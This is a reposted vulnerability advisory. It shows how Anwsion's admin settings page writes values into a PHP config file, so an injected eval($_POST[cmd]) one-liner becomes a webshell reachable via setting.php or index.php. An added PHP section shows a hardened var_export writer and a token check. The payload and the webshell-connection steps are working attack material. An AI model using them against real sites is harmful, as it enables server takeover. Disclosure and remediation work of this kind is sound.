Anwsion admin backend design flaw allows getting a shell

Source: Internet
Author: User

The vulnerability affects all versions.

Combined with all versions earlier than Anwsion 0.7, the site can be compromised.

The code containing the design flaw is shown below (lines 75-96). It saves the site's admin configuration to the database and also writes it to a local PHP file, so a one-line webshell (a "one-sentence" backdoor) written into a setting gets executed.
/App/admin/controller/c_setting_class.inc.php

// Save parameters to the database
$retval = $this->model('setting')->set_vars($vars);

// Save the cached file
if (!$this->model('setting')->update_setting_config())
{
    H::ajax_json_output(AWS_APP::RSM(null, "-1", 'The configuration file cannot be written. Set the permission of system/config/setting.php to 0777.'));
}

if ($retval)
{
    ZCACHE::delete("setting_config");

    H::ajax_json_output(AWS_APP::RSM(null, "1", "System settings modified successfully"));
}
else
{
    H::ajax_json_output(AWS_APP::RSM(null, "-1", "Failed to modify system settings"));
}
} // end of the enclosing method (excerpt)

The content of the written configuration file system/config/setting.php is as follows:

Access the admin system settings page:
http://sa.sebug.net/admin/setting/setting/group_id-1

In the website overview field, add the one-liner \';eval($_POST[cmd]);//

The webshell management tool connects to the one-liner at /system/config/setting.php
In Anwsion 0.6 and earlier, the configuration file is written to /gzphp/config/setting.php
If the one-liner file cannot be accessed directly because of rewrite restrictions, the management tool can connect to /index.php instead.

The connection to the one-liner file succeeds.


Solution:

Wait for the official patch or follow the latest updates.

After the vulnerability is released, developers will be notified to claim it to avoid malicious exploitation.
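
One way to remove this class of flaw, added here as an example and not taken from Anwsion or the original post: write settings as data with var_export() and check the generated file before saving it. The function names, the sample settings and the weak writer's escaping are assumptions for illustration.

```php
<?php
// Added example, not Anwsion code. The page does not show how
// update_setting_config() builds the file, so both writers are hypothetical.

// Weak pattern: values pasted into PHP source with only the quote escaped.
function render_settings_weak(array $vars): string
{
    $out = "<?php\nreturn array (\n";
    foreach ($vars as $key => $value) {
        // A value containing \' turns into \\' and closes the literal early.
        $out .= "  '$key' => '" . str_replace("'", "\\'", $value) . "',\n";
    }
    return $out . ");\n";
}

// Hardened writer: var_export() escapes both ' and \, so a value always
// stays inside its string literal.
function render_settings(array $vars): string
{
    return "<?php\nreturn " . var_export($vars, true) . ";\n";
}

// Check before writing: tokenise the generated source and accept it only if
// every token belongs to a literal array (no variables, calls, comments).
function is_pure_data(string $source): bool
{
    $literal = [T_OPEN_TAG, T_RETURN, T_WHITESPACE, T_ARRAY, T_DOUBLE_ARROW,
                T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER];
    foreach (token_get_all($source) as $tok) {
        if (is_string($tok)) {                    // single-character token
            if (strpos('(),;-', $tok) === false) return false;
        } elseif ($tok[0] === T_STRING) {         // bare words: true/false/null only
            if (!in_array(strtolower($tok[1]), ['true', 'false', 'null'], true)) return false;
        } elseif (!in_array($tok[0], $literal, true)) {
            return false;
        }
    }
    return true;
}

// Constructed sample settings; site_desc holds a quote-and-backslash value.
$vars = ['site_name' => 'My site', 'site_desc' => "\\'; echo 1; //"];

var_dump(is_pure_data(render_settings_weak($vars)));  // weak writer output
var_dump(is_pure_data(render_settings($vars)));       // hardened writer output
```

The check rejects the weak writer's output for this sample and accepts the var_export() output, where the same value stays a single string literal.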

I wonder why one more \ is added to the one-liner in the vulnerability preview. Is this added to prevent XSS attacks?
I do not know whether one more \ will still be added when the page is viewed in a browser after the review is passed. Otherwise, others' testing will be misled.





 
